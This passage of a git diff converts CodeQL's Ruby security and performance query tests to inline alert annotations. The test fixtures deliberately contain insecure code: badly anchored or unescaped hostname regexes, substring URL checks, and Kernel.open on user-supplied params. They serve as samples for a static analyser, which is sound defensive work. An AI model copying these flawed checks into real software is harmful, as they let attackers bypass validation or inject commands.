a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref +++ b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfCode.qlref @@ -1 +1 @@ -queries/metrics/FLinesOfCode.ql \ No newline at end of file +query: queries/metrics/FLinesOfCode.ql diff --git a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref index 766ae4bcc590..3f0bff7371d2 100644 --- a/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref +++ b/ruby/ql/test/query-tests/metrics/FLines/FLinesOfComments.qlref @@ -1 +1 @@ -queries/metrics/FLinesOfComments.ql \ No newline at end of file +query: queries/metrics/FLinesOfComments.ql diff --git a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref index f2a94b28c407..453e0a3f399f 100644 --- a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref +++ b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.qlref @@ -1 +1,2 @@ -experimental/performance/UseDetect.ql +query: experimental/performance/UseDetect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb index e1d2d9b91ba0..2c2602e72e62 100644 --- a/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb +++ b/ruby/ql/test/query-tests/performance/UseDetect/UseDetect.rb @@ -2,14 +2,14 @@ class DetectTest def test # These are bad - [].select { |i| true }.first - [].select { |i| true }.last - [].select { |i| true }[0] - [].select { |i| true }[-1] - [].filter { |i| true }.first - [].find_all { |i| true }.last + [].select { |i| true }.first # $ Alert + [].select { |i| true }.last # $ Alert + [].select { |i| true }[0] # $ Alert + [].select { |i| true }[-1] # $ Alert + [].filter { |i| true }.first # $ Alert + [].find_all { |i| true }.last # $ Alert selection1 = [].select { |i| true } - selection1.first + selection1.first # $ Alert # These are good [].select("").first # Selecting a string diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref index 7fd45d159ce4..93a6200ff175 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/IncompleteHostnameRegExp.ql \ No newline at end of file +query: queries/security/cwe-020/IncompleteHostnameRegExp.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb index 5a5c96692ce0..32aa8ad9491d 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/hosttest.rb @@ -1,6 +1,6 @@ -UNSAFE_REGEX1 = /(www|beta).example.com\// -UNSAFE_REGEX2 = Regexp.compile("(www|beta).example.com/") -UNSAFE_REGEX3 = Regexp.new("(www|beta).example.com/") +UNSAFE_REGEX1 = /(www|beta).example.com\// # $ Alert +UNSAFE_REGEX2 = Regexp.compile("(www|beta).example.com/") # $ Alert +UNSAFE_REGEX3 = Regexp.new("(www|beta).example.com/") # $ Alert SAFE_REGEX = /(www|beta)\.example\.com\// def unsafe diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb index 7041e4dc9c46..7d29b530acf1 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.rb @@ -1,31 +1,31 @@ def foo /^http:\/\/example.com/; # OK - /^http:\/\/test.example.com/; # NOT OK + /^http:\/\/test.example.com/; # NOT OK # $ Alert /^http:\/\/test\.example.com/; # OK - /^http:\/\/test.example.net/; # NOT OK - /^http:\/\/test.(example-a|example-b).com/; # NOT OK - /^http:\/\/(.+).example.com\//; # NOT OK + /^http:\/\/test.example.net/; # NOT OK # $ Alert + /^http:\/\/test.(example-a|example-b).com/; # NOT OK # $ Alert + /^http:\/\/(.+).example.com\//; # NOT OK # $ Alert /^http:\/\/(\.+)\.example.com/; # OK - /^http:\/\/(?:.+)\.test\.example.com\//; # NOT OK - /^http:\/\/test.example.com\/(?:.*)/; # OK - Regexp.new("^http://test.example.com"); # NOT OK - if (s.match("^http://test.example.com")); end # NOT OK + /^http:\/\/(?:.+)\.test\.example.com\//; # NOT OK # $ Alert + /^http:\/\/test.example.com\/(?:.*)/; # OK # $ Alert + Regexp.new("^http://test.example.com"); # NOT OK # $ Alert + if (s.match("^http://test.example.com")); end # NOT OK # $ Alert - Regexp.new(id(id(id("^http://test.example.com")))); # NOT OK + Regexp.new(id(id(id("^http://test.example.com")))); # NOT OK # $ Alert - Regexp.new(`test.example.com$`); # NOT OK + Regexp.new(`test.example.com$`); # NOT OK # $ Alert - hostname = '^test.example.com'; # NOT OK - Regexp.new("#{hostname}$"); + hostname = '^test.example.com'; # NOT OK # $ Alert + Regexp.new("#{hostname}$"); # $ Alert - domain = { hostname: 'test.example.com$' }; # NOT OK + domain = { hostname: 'test.example.com$' }; # NOT OK # $ Alert Regexp.new(domain[:hostname]); - convert1({ hostname: 'test.example.com$' }); # NOT OK + convert1({ hostname: 'test.example.com$' }); # NOT OK # $ Alert domains = [ { hostname: 'test.example.com$' } ]; # NOT OK - but not flagged due to limitations of TypeTracking. @@ -34,18 +34,18 @@ def foo domains.map{ |d| convert2(d) }; /^(.+\.(?:example-a|example-b)\.com)\//; # NOT OK - /^(https?:)?\/\/((service|www).)?example.com(?=$|\/)/; # NOT OK - /^(http|https):\/\/www.example.com\/p\/f\//; # NOT OK - /^(http:\/\/sub.example.com\/)/i; # NOT OK - /^https?:\/\/api.example.com/; # NOT OK - Regexp.new('^http://localhost:8000|' + "^https?://.+\\.example\\.com/"); # NOT OK + /^(https?:)?\/\/((service|www).)?example.com(?=$|\/)/; # NOT OK # $ Alert + /^(http|https):\/\/www.example.com\/p\/f\//; # NOT OK # $ Alert + /^(http:\/\/sub.example.com\/)/i; # NOT OK # $ Alert + /^https?:\/\/api.example.com/; # NOT OK # $ Alert + Regexp.new('^http://localhost:8000|' + "^https?://.+\\.example\\.com/"); # NOT OK # $ Alert Regexp.new("^http[s]?:\/\/?sub1\\.sub2\\.example\\.com\/f\/(.+)"); # NOT OK - /^https:\/\/[a-z]*.example.com$/; # NOT OK - Regexp.compile('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); # NOT OK + /^https:\/\/[a-z]*.example.com$/; # NOT OK # $ Alert + Regexp.compile('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); # NOT OK # $ Alert /^(example.dev|example.com)/; # OK - Regexp.new('^http://localhost:8000|' + "^https?://.+.example\\.com/"); # NOT OK + Regexp.new('^http://localhost:8000|' + "^https?://.+.example\\.com/"); # NOT OK # $ Alert primary = 'example.com$'; Regexp.new('test.' + primary); # NOT OK, but not detected @@ -56,7 +56,7 @@ def foo /^http:\/\/(..|...)\.example\.com\/index\.html/; # OK, wildcards are intentional /^http:\/\/.\.example\.com\/index\.html/; # OK, the wildcard is intentional - /^(foo.example\.com|whatever)$/; # kinda OK - one disjunction doesn't even look like a hostname + /^(foo.example\.com|whatever)$/; # kinda OK - one disjunction doesn't even look like a hostname # $ Alert end def id(e); return e; end def convert1(domain) @@ -78,4 +78,4 @@ def self.match?(x) end end -B.match?("^http://test.example.com") # NOT OK +B.match?("^http://test.example.com") # NOT OK # $ Alert diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref index dea02dce1538..077f367fe477 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/IncompleteUrlSubstringSanitization.ql +query: queries/security/cwe-020/IncompleteUrlSubstringSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb index dc6d49de57af..11094f6ee0b0 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.rb @@ -1,23 +1,23 @@ def test (x) x.index("internal") != nil; # NOT OK, but not flagged x.index("localhost") != nil; # NOT OK, but not flagged - x.index("secure.com") != nil; # NOT OK - x.index("secure.net") != nil; # NOT OK - x.index(".secure.com") != nil; # NOT OK + x.index("secure.com") != nil; # NOT OK # $ Alert + x.index("secure.net") != nil; # NOT OK # $ Alert + x.index(".secure.com") != nil; # NOT OK # $ Alert x.index("sub.secure.") != nil; # NOT OK, but not flagged x.index(".sub.secure.") != nil; # NOT OK, but not flagged - x.index("secure.com") === nil; # NOT OK - x.index("secure.com") === 0; # NOT OK - x.index("secure.com") >= 0; # NOT OK + x.index("secure.com") === nil; # NOT OK # $ Alert + x.index("secure.com") === 0; # NOT OK # $ Alert + x.index("secure.com") >= 0; # NOT OK # $ Alert - x.start_with?("https://secure.com"); # NOT OK - x.end_with?("secure.com"); # NOT OK + x.start_with?("https://secure.com"); # NOT OK # $ Alert + x.end_with?("secure.com"); # NOT OK # $ Alert x.end_with?(".secure.com"); # OK x.start_with?("secure.com/"); # OK x.index("secure.com/") === 0; # OK - x.include?("secure.com"); # NOT OK + x.include?("secure.com"); # NOT OK # $ Alert x.index("#") != nil; # OK x.index(":") != nil; # OK @@ -29,9 +29,9 @@ def test (x) x.index("some/path") != nil; # OK x.index("/index.html") != nil; # OK x.index(":template:") != nil; # OK - x.index("https://secure.com") != nil; # NOT OK - x.index("https://secure.com:443") != nil; # NOT OK - x.index("https://secure.com/") != nil; # NOT OK + x.index("https://secure.com") != nil; # NOT OK # $ Alert + x.index("https://secure.com:443") != nil; # NOT OK # $ Alert + x.index("https://secure.com/") != nil; # NOT OK # $ Alert x.index(".cn") != nil; # NOT OK, but not flagged x.index(".jpg") != nil; # OK @@ -49,28 +49,28 @@ def test (x) x.index("tar.gz") + offset; # OK x.index("tar.gz") - offset; # OK - x.index("https://example.internal") != nil; # NOT OK + x.index("https://example.internal") != nil; # NOT OK # $ Alert x.index("https://") != nil; # OK - x.start_with?("https://example.internal"); # NOT OK - x.index('https://example.internal.org') != 0; # NOT OK - x.index('https://example.internal.org') === 0; # NOT OK - x.end_with?("internal.com"); # NOT OK + x.start_with?("https://example.internal"); # NOT OK # $ Alert + x.index('https://example.internal.org') != 0; # NOT OK # $ Alert + x.index('https://example.internal.org') === 0; # NOT OK # $ Alert + x.end_with?("internal.com"); # NOT OK # $ Alert x.start_with?("https://example.internal:80"); # OK - x.index("secure.com") != nil; # NOT OK - x.index("secure.com") === nil; # OK - !(x.index("secure.com") != nil); # OK - !x.include?("secure.com"); # OK + x.index("secure.com") != nil; # NOT OK # $ Alert + x.index("secure.com") === nil; # OK # $ Alert + !(x.index("secure.com") != nil); # OK # $ Alert + !x.include?("secure.com"); # OK # $ Alert - if !x.include?("secure.com") # NOT OK + if !x.include?("secure.com") # NOT OK # $ Alert else doSomeThingWithTrustedURL(x); end x.start_with?("https://secure.com/foo/bar"); # OK - a forward slash after the domain makes prefix checks safe. - x.index("https://secure.com/foo/bar") >= 0 # NOT OK - the url can be anywhere in the string. - x.index("https://secure.com") >= 0 # NOT OK - x.index("https://secure.com/foo/bar-baz") >= 0 # NOT OK - the url can be anywhere in the string. + x.index("https://secure.com/foo/bar") >= 0 # NOT OK - the url can be anywhere in the string. # $ Alert + x.index("https://secure.com") >= 0 # NOT OK # $ Alert + x.index("https://secure.com/foo/bar-baz") >= 0 # NOT OK - the url can be anywhere in the string. # $ Alert end diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected index 4032d044fd86..94cdef1f29be 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected @@ -1,3 +1,7 @@ +#select +| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | edges | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | provenance | | | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | provenance | | @@ -10,7 +14,3 @@ nodes | impl/miss-anchor.rb:14:12:14:15 | name | semmle.label | name | | impl/miss-anchor.rb:15:47:15:50 | name | semmle.label | name | subpaths -#select -| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref index 4b61fcc56d74..8de0d5036bb1 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/MissingFullAnchor.ql \ No newline at end of file +query: queries/security/cwe-020/MissingFullAnchor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb index c488990062ab..2ae1020e6d67 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb @@ -1,17 +1,17 @@ class Foobar - def foo1(name) - raise Blabity, 'Invalid thing' if name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK + def foo1(name) # $ Source + raise Blabity, 'Invalid thing' if name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK # $ Alert end - def foo2(name) - raise Blabity, 'Invalid thing' unless name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK + def foo2(name) # $ Source + raise Blabity, 'Invalid thing' unless name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK # $ Alert end def foo3(name) raise Blabity, 'Invalid thing' unless name !~ /\A[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*\z/ # OK end - def foo4(name) - raise Blabity, 'Invalid thing' unless not name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK + def foo4(name) # $ Source + raise Blabity, 'Invalid thing' unless not name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref index bd3ad563aec1..ffb6ae961f63 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/MissingRegExpAnchor.ql \ No newline at end of file +query: queries/security/cwe-020/MissingRegExpAnchor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb index 11410d7db1f4..ac2fd382934a 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb @@ -1,11 +1,11 @@ -/www\.example\.com/ # BAD +/www\.example\.com/ # BAD # $ Alert /^www\.example\.com$/ # BAD: uses end-of-line anchors rather than end-of-string anchors /\Awww\.example\.com\z/ # GOOD /foo\.bar/ # GOOD -/https?:\/\/good\.com/ # BAD -/^https?:\/\/good\.com/ # BAD: missing end-of-string anchor +/https?:\/\/good\.com/ # BAD # $ Alert +/^https?:\/\/good\.com/ # BAD: missing end-of-string anchor # $ Alert /(^https?:\/\/good1\.com)|(^https?:#good2\.com)/ # BAD: missing end-of-string anchor /bar/ # GOOD @@ -16,40 +16,40 @@ foo.sub!(/www\.example\.com/, "bar") # GOOD /^a|/ -/^a|b/ # BAD +/^a|b/ # BAD # $ Alert /a|^b/ /^a|^b/ -/^a|b|c/ # BAD +/^a|b|c/ # BAD # $ Alert /a|^b|c/ /a|b|^c/ /^a|^b|c/ /(^a)|b/ -/^a|(b)/ # BAD +/^a|(b)/ # BAD # $ Alert /^a|(^b)/ -/^(a)|(b)/ # BAD +/^(a)|(b)/ # BAD # $ Alert -/a|b$/ # BAD +/a|b$/ # BAD # $ Alert /a$|b/ /a$|b$/ -/a|b|c$/ # BAD +/a|b|c$/ # BAD # $ Alert /a|b$|c/ /a$|b|c/ /a|b$|c$/ /a|(b$)/ -/(a)|b$/ # BAD +/(a)|b$/ # BAD # $ Alert /(a$)|b$/ -/(a)|(b)$/ # BAD +/(a)|(b)$/ # BAD # $ Alert -/^good.com|better.com/ # BAD -/^good\.com|better\.com/ # BAD -/^good\\.com|better\\.com/ # BAD -/^good\\\.com|better\\\.com/ # BAD -/^good\\\\.com|better\\\\.com/ # BAD +/^good.com|better.com/ # BAD # $ Alert +/^good\.com|better\.com/ # BAD # $ Alert +/^good\\.com|better\\.com/ # BAD # $ Alert +/^good\\\.com|better\\\.com/ # BAD # $ Alert +/^good\\\\.com|better\\\\.com/ # BAD # $ Alert -/^foo|bar|baz$/ # BAD +/^foo|bar|baz$/ # BAD # $ Alert /^foo|%/ # OK REGEXP = /foo/ @@ -57,5 +57,5 @@ REGEXP.match "http://example.com" # GOOD: the url is the text not the regexp "http://example.com".match? REGEXP # GOOD: the url is the text not the regexp "http://example.com".match REGEXP # GOOD: the url is the text not the regexp -"some text".match? "http://example.com" # BAD -"some text".match "http://example.com" # BAD +"some text".match? "http://example.com" # BAD # $ Alert +"some text".match "http://example.com" # BAD # $ Alert diff --git a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref index f1d6eea73c2c..476daefd7f31 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/OverlyLargeRange.ql +query: queries/security/cwe-020/OverlyLargeRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb index ed6ffe21b14a..18aaf573afa0 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb @@ -1,8 +1,8 @@ -overlap1 = /^[0-93-5]$/ # NOT OK +overlap1 = /^[0-93-5]$/ # NOT OK # $ Alert -overlap2 = /[A-ZA-z]/ # NOT OK +overlap2 = /[A-ZA-z]/ # NOT OK # $ Alert -isEmpty = /^[z-a]$/ # NOT OK +isEmpty = /^[z-a]$/ # NOT OK # $ Alert isAscii = /^[\x00-\x7F]*$/ # OK @@ -12,22 +12,22 @@ NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/ # OK -smallOverlap = /[0-9a-fA-f]/ # NOT OK +smallOverlap = /[0-9a-fA-f]/ # NOT OK # $ Alert -weirdRange = /[$-`]/ # NOT OK +weirdRange = /[$-`]/ # NOT OK # $ Alert -keywordOperator = /[!\~\*\/%+-<>\^|=&]/ # NOT OK +keywordOperator = /[!\~\*\/%+-<>\^|=&]/ # NOT OK # $ Alert -notYoutube = /youtu\.be\/[a-z1-9.-_]+/ # NOT OK +notYoutube = /youtu\.be\/[a-z1-9.-_]+/ # NOT OK # $ Alert -numberToLetter = /[7-F]/ # NOT OK +numberToLetter = /[7-F]/ # NOT OK # $ Alert -overlapsWithClass1 = /[0-9\d]/ # NOT OK +overlapsWithClass1 = /[0-9\d]/ # NOT OK # $ Alert -overlapsWithClass2 = /[\w,.-?:*+]/ # NOT OK +overlapsWithClass2 = /[\w,.-?:*+]/ # NOT OK # $ Alert escapes = /[\000-\037\047\134\177-\377]/n # OK - they are escapes nested = /[a-z&&[^a-c]]/ # OK -overlapsWithNothing = /[\w_%-.]/; \ No newline at end of file +overlapsWithNothing = /[\w_%-.]/; # $ Alert \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected index 67e618a3a1fd..25fd9e3e37a3 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected @@ -1,3 +1,14 @@ +#select +| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | edges | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:4:10:4:13 | file | provenance | | | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:5:13:5:16 | file | provenance | | @@ -28,14 +39,3 @@ nodes | KernelOpen.rb:13:23:13:26 | file | semmle.label | file | | KernelOpen.rb:26:10:26:13 | file | semmle.label | file | subpaths -#select -| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 